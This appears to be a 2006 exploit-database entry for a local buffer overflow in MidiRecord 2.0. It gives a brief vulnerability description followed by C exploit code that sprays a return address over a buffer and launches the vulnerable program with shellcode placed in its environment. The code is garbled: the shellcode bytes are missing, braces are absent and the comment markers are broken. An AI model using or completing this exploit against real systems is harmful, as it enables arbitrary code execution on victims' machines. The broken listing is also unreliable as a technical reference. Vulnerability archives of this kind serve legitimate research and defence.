MidiRecord2 MidiRecord.CC - Local Buffer Overflow

Type exploitpack
Reporter Dedi Dwianto
Modified 2006-07-27T00:00:00


MidiRecord2 MidiRecord.CC - Local Buffer Overflow

                                            // source: https://www.securityfocus.com/bid/19190/info

Midirecord is prone to a local buffer-overflow vulnerability because it fails to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the victim running the affected application. 

Version 2.0 is vulnerable to this issue; other versions may also be affected.

* Successful Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1
int main(int argc, char **argv )
        char shellcode[]=

        if(argc < 2)
           fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
             return 0;
        char *env[] = {shellcode, NULL};
        char buf[BUFSIZE];
                int i;
                int *ap = (int *)(buf + ALIGNMENT);
                int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

                for (i = 0; i < BUFSIZE - 4; i += 4)
                *ap++ = ret;
                execle(argv[1], "/dev/midi1", buf, NULL, env);